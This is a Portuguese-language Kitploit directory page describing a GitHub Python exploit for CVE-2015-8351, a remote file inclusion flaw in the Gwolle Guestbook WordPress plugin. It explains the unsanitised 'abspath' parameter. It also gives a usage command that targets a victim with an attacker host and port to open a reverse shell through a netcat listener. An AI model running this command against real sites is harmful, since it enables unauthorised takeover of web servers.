Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
exploit-CVE-2015-8351 — WordPress Plugin Gwolle Guestbook 1.5.3 - Inclusão Remota de Arquivo | Kitploit
Ferramentas/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

WordPress Plugin Gwolle Guestbook 1.5.3 - Inclusão Remota de Arquivo

Ver Repositório
2há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gwolle Guestbook WordPress Plugin RFI Exploit

Este script Python explora uma vulnerabilidade crítica de Inclusão Remota de Arquivos (RFI) no plugin Gwolle Guestbook para WordPress, que pode ser explorada por um atacante não autenticado para incluir um arquivo PHP remoto e executar código arbitrário no sistema vulnerável.

Detalhes da Vulnerabilidade

O parâmetro HTTP GET "abspath" não está sendo devidamente sanitizado antes de ser usado na função require() do PHP. Um atacante remoto pode incluir um arquivo chamado 'wp-load.php' de um servidor remoto arbitrário e executar seu conteúdo no servidor web vulnerável. Para isso, o atacante precisa colocar um arquivo 'wp-load.php' malicioso na raiz de documentos do seu servidor e incluir a URL do servidor na requisição.

A exploração bem-sucedida desta vulnerabilidade pode levar ao comprometimento de toda a instalação do WordPress e pode até mesmo resultar no comprometimento de todo o servidor web.

Uso

O script requer três argumentos:

  • URL do alvo: A URL da instalação do WordPress vulnerável.
  • Host do atacante: O endereço IP ou nome do host da máquina do atacante.
  • Porta do atacante: O número da porta onde o atacante está ouvindo um reverse shell.

Exemplo:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

Nota: Você precisa ter um listener netcat aberto na máquina do atacante na porta especificada.

Aviso Legal

Este script é fornecido apenas para fins educacionais. O autor não é responsável por quaisquer danos causados pelo mau uso deste script.

Baixar ferramenta